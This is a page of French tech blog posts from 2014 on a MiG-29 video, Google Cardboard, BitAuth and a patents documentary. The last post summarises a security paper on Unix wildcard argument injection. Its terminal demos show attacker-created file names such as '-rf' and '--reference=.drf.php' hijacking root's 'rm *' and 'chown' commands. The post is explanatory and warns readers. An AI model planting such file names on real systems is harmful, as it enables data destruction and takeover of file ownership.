Korben

A dada sur Mikoyan-Gourevitch

lundi 7 juillet 2014 à 13:30

Fulcrum Drivers II est une vidéo réalisée par l'armée de l'air polonaise qui s'entraine (formation, simulation d'engagement et tir de missile) sur une musique de The Glitch Mob (We Can Make The World Stop) à bord de leurs MiG-29...

Bref, l'idéal pour prendre un peu l'air ce lundi...

Et voici la première partie de la série si vous l'aviez manqué.

Cet article merveilleux et sans aucun égal intitulé : A dada sur Mikoyan-Gourevitch ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

Cardboard – Fabriquez-vous un Oculus Rift avec une boite à pizza

lundi 7 juillet 2014 à 10:30

Si vous avez un peu de carton chez vous et une paire de ciseaux, je vous propose d'aller télécharger les plans du Cardboard Project initié par Google, qui consiste à fabriquer soi-même un support pour votre téléphone afin de le transformer en lunettes de réalité virtuelle semblable à l'Oculus Rift.

À côté de ça, Google a mis en ligne une application baptisée Cardboard qui s'installe sur le téléphone et qui permet de se balader dans Streetview, regarder des vidéos YouTube, de visionner des photosphères...etc., en réalité virtuelle.

D'autres démos sont aussi accessibles via Chrome pour Android ici et ce projet va vous permettre de tester vos logiciels ou projets utilisant de la réalité virtuelle sans avoir à investir tout de suite dans un casque.

À se réserver pour les dimanches après-midi pluvieux.

Cet article merveilleux et sans aucun égal intitulé : Cardboard – Fabriquez-vous un Oculus Rift avec une boite à pizza ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

BitAuth – Un système d’authentification sécurisé basé sur Bitcoin

lundi 7 juillet 2014 à 09:30

La société BitPay qui propose des solutions de paiement Bitcoin à destination des entreprises a annoncé fin de semaine dernière un nouveau système d'authentification sans mot de passe.

Ce système sécurisé exploite le même type de chiffrement et les mêmes processus que ceux utilisés dans le protocole Bitcoin. Pas de secret partagé, mais un système de clé publique / clé privée.

Le client signe chaque requête en utilisant la clé privée et c'est le serveur qui valide en vérifiant que la signature est valide grâce à la clé publique.Baptisé BitAuth, ce système est destiné à remplacer le couple login/mot de passe.

Pour cela, BitAuth génère une paire de clés, puis à partir de la clé publique, il produit un code unique appelé SIN pour System Identification Number. Il partage ensuite ce SIN au moment de votre enregistrement sur le service en question.

Ensuite, quand vous effectuez une requête vers le service via HTTP, la signature contenue dans le header de la requête contient des données chiffrées avec votre clé privée. Si ces données sont validées côté serveur, vous êtes alors authentifié.

Top !

Plus de mots de passe donc et surtout plus de stockage sur un serveur... mais plutôt un partage de ces informations entre tous les clients BitAuth.

Que ce soit BitAuth ou un système similaire, ce genre de chose, c'est l'avenir. Le mot de passe c'est tellement dépassé, et tellement risqué puisqu'il est trimballé souvent en clair de serveur en serveur et dans des bases diverses. Le seul moyen de voler une authentification est donc de voler la machine sur laquelle se trouve la clé privée.

Cela limite donc grandement les risques, surtout qu'on pourra, je pense passer par un gestionnaire de clé qui donnera accès à ces clés via un mot de passe local que seul le possesseur de la machine connaitra. Du coup, en cas de vol, il faudra connaitre le mot de passe maitre du gestionnaire de clé, pour accéder aux clés privées.

Si BitAuth vous intéresse, sachez que des bibliothèques sont déjà disponibles et que tout est sous licence libre.

connect-bitauth
passport-bitauth

Si vous voulez plus d'infos sur BitAuth, tout est ici.

Cet article merveilleux et sans aucun égal intitulé : BitAuth – Un système d’authentification sécurisé basé sur Bitcoin ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

La guerre des brevets – Un reportage à ne pas manquer

vendredi 4 juillet 2014 à 13:00

ARTE a consacré un reportage entier aux brevets. Si vous ne connaissez pas bien ce sujet, je vous invite vivement à le regarder.

Voici le résumé :

Aux États-Unis, des femmes atteintes d’un cancer du sein ont mené une croisade juridique victorieuse contre Myriad Genetics. En brevetant deux gènes dont la mutation révèle une prédisposition au développement conjoint d’un cancer des ovaires, le laboratoire s’était assuré un monopole sur les tests de dépistage, mettant potentiellement en danger la vie de patientes, dans l’incapacité d’assumer le coût de l’examen.

Alors que les lois sur les brevets ont été imaginées pour protéger les appareils et procédés techniques, comment expliquer que 20 % des gènes humains tombent aujourd’hui sous le coup de droits d’exclusivité d’exploitation en Amérique ?

Pour David Martin, spécialiste de la propriété intellectuelle, le tournant a eu lieu dans les années 1980 quand, dépassés par le Japon en nombre de brevets déposés, les États-Unis ont révisé leur législation. En supprimant l’obligation de prouver la mise en application d’une invention et en autorisant la brevetabilité de la recherche universitaire, ils ont ouvert la voie à une confiscation (provisoire) du savoir : une situation à l’origine d’un différend entre pays riches et pays en développement. Ces derniers militent, entre autres, pour un accès aux médicaments à des prix abordables. C’est le cas notamment de l’Inde qui, en plus de payer des licences, se voit contrainte de protéger ses ressources traditionnelles – du riz basmati aux postures de yoga –, pour éviter que d'autres ne les brevètent…

Les brevets en particulier sur le vivant sont un réel danger pour notre avenir. On le voit très bien avec tout ce qui est semences. C'est d'ailleurs aussi pour ça que je crois qu'il est important de résister contre ces entreprises qui veulent verrouiller ce que nous mangeons et ce que nous plantons, car cela nous mènera à notre propre perte. Ces brevets sont des brevets de mort. Littéralement. Si vous ne le faite pas pour vous, faites le au moins pour vos enfants.

Résistez en aidez à la diversité, en partageant le vivant et les connaissance et en favorisant la fertilité ! Arrêtez d'aller acheter vos graines en grande surface et adhérez plutôt à des associations ou faites des échanges avec ceux qui s'acharnent à protéger le vivant et maintenant la biodiversité.

Source

Cet article merveilleux et sans aucun égal intitulé : La guerre des brevets – Un reportage à ne pas manquer ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

Unix – L’étoile de la mort

vendredi 4 juillet 2014 à 11:35

Des chercheurs en sécurité de DefenseCode viennent de publier un papier très intéressant pour qui s'intéresse un peu au hacking et au système Unix (Linux, OSX...etc.). Dans ce document, Leon de DefenseCode passe en revue quelques techniques fourbes qui exploitent le symbole '*' (wildcards) combiné à certaines commandes, pour injecter des arguments dans les commandes shells.

Par exemple, si un vilain pirate dépose sur votre serveur un fichier qu'il nomme "-rf'", celui-ci peut être passé en argument à la commande "rm" provoquant pas mal de dégâts. Démonstration :

[root@defensecode public]# ls -al
total 20
drwxrwxr-x.  5 leon   leon   4096 Oct 28 17:04 .
drwx------. 22 leon   leon   4096 Oct 28 16:15 ..
drwxrwxr-x.  2 leon   leon   4096 Oct 28 17:04 DIR1
drwxrwxr-x.  2 leon   leon   4096 Oct 28 17:04 DIR2
drwxrwxr-x.  2 leon   leon   4096 Oct 28 17:04 DIR3
-rw-rw-r--.  1 leon   leon      0 Oct 28 17:03 file1.txt
-rw-rw-r--.  1 leon   leon      0 Oct 28 17:03 file2.txt
-rw-rw-r--.  1 leon   leon      0 Oct 28 17:03 file3.txt
-rw-rw-r--.  1 nobody nobody    0 Oct 28 16:38 -rf

On voit là un répertoire avec quelques sous-répertoires et fichiers. Le fichier -rf appartient à l'utilisateur nobody. Imaginons maintenant que l'utilisateur root lance maintenant la commande "rm *"

[root@defensecode public]# rm *
[root@defensecode public]# ls -al
total 8
drwxrwxr-x.  2 leon   leon   4096 Oct 28 17:05 .
drwx------. 22 leon   leon   4096 Oct 28 16:15 ..
-rw-rw-r--.  1 nobody nobody    0 Oct 28 16:38 -rf

Tout le répertoire a été vidé, y compris les sous-répertoires. En réalité, la commande rm couplée à l'étoile passe en revue chaque fichier et sous répertoire comme ceci :

[user@defensecode WILD]$ rm DIR1 DIR2 DIR3 file1.txt file2.txt file3.txt -rf

Vous l'aurez compris, le fichier -rf est alors pris comme un argument, provoquant la suppression des répertoires sans aucun avertissement.

Autre exemple, avec un changement de droits fait à l'insue de l'utilisateur root... Pour cela, l'attaquant a déposé un fichier ".drf.php" et un fichier "--reference=.drf.php" sur le serveur.

[root@defensecode public]# ls -al
total 52
drwxrwxrwx. 2 user user 4096 Oct 28 17:47 .
drwx------. 22 user user 4096 Oct 28 17:34 ..
-rw-rw-r--. 1 user user 66 Oct 28 17:36 admin.php
-rw-rw-r--. 1 user user 34 Oct 28 17:35 ado.php
-rw-rw-r--. 1 user user 80 Oct 28 17:44 config.php
-rw-rw-r--. 1 user user 187 Oct 28 17:44 db.php
-rw-rw-r--. 1 user user 201 Oct 28 17:35 download.php
-rw-r--r--. 1 leon leon 0 Oct 28 17:40 .drf.php
-rw-rw-r--. 1 user user 43 Oct 28 17:35 file1.php
-rw-rw-r--. 1 user user 56 Oct 28 17:47 footer.php
-rw-rw-r--. 1 user user 357 Oct 28 17:36 global.php
-rw-rw-r--. 1 user user 225 Oct 28 17:35 header.php
-rw-rw-r--. 1 user user 117 Oct 28 17:35 inc.php
-rw-rw-r--. 1 user user 111 Oct 28 17:38 index.php
-rw-rw-r--. 1 leon leon 0 Oct 28 17:45 --reference=.drf.php
-rw-rw----. 1 user user 66 Oct 28 17:35 password.inc.php
-rw-rw-r--. 1 user user 94 Oct 28 17:35 script.php

Comme vous pouvez le voir, seuls ces 2 fichiers appartiennent à l'attaquant "leon". Maintenant, imaginons sur l'utilisateur root fasse quelques petits changements de droits sur les fichiers en utilisant la fameuse étoile. Il souhaite les attribuer à l'utilisateur "nobody".

[root@defensecode public]# chown -R nobody:nobody *.php

Voici le résultat :

[root@defensecode public]# ls -al
total 52
drwxrwxrwx. 2 user user 4096 Oct 28 17:47 .
drwx------. 22 user user 4096 Oct 28 17:34 ..
-rw-rw-r--. 1 leon leon 66 Oct 28 17:36 admin.php
-rw-rw-r--. 1 leon leon 34 Oct 28 17:35 ado.php
-rw-rw-r--. 1 leon leon 80 Oct 28 17:44 config.php
-rw-rw-r--. 1 leon leon 187 Oct 28 17:44 db.php
-rw-rw-r--. 1 leon leon 201 Oct 28 17:35 download.php
-rw-r--r--. 1 leon leon 0 Oct 28 17:40 .drf.php
-rw-rw-r--. 1 leon leon 43 Oct 28 17:35 file1.php
-rw-rw-r--. 1 leon leon 56 Oct 28 17:47 footer.php
-rw-rw-r--. 1 leon leon 357 Oct 28 17:36 global.php
-rw-rw-r--. 1 leon leon 225 Oct 28 17:35 header.php
-rw-rw-r--. 1 leon leon 117 Oct 28 17:35 inc.php
-rw-rw-r--. 1 leon leon 111 Oct 28 17:38 index.php
-rw-rw-r--. 1 leon leon 0 Oct 28 17:45 --reference=.drf.php
-rw-rw----. 1 leon leon 66 Oct 28 17:35 password.inc.php
-rw-rw-r--. 1 leon leon 94 Oct 28 17:35 script.php

Tous les fichiers ont changé de propriétaire... Et ce n'est pas nobody mais leon qui est devenu le proprio de tous les fichiers PHP. Mais quelle est cette sorcellerie ?

Et bien, grâce aux 2 fichiers envoyés, quand la commande chown est passée, elle a pris comme argument "--reference=.drf.php", ce qui veut dire en langage clair : "Utilise le propriétaire du fichier .drf.php comme référence". Cela surcharge le paramètre nobody:nobody spécifié dans la commande lancée en root et fait de leon le propriétaire de tous les autres fichiers php.

Mortel !

Il s'agit là d'un aperçu pour vous montrer un peu ce principe connu depuis les années 80 et toujours possible. Ce document donne d'autres exemples qui sont tout aussi intéressants.

Maintenant vous savez que c'est possible, alors pensez-y la prochaine fois que vous utiliserez l'étoile dans une de vos commandes.

Source

Cet article merveilleux et sans aucun égal intitulé : Unix – L’étoile de la mort ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.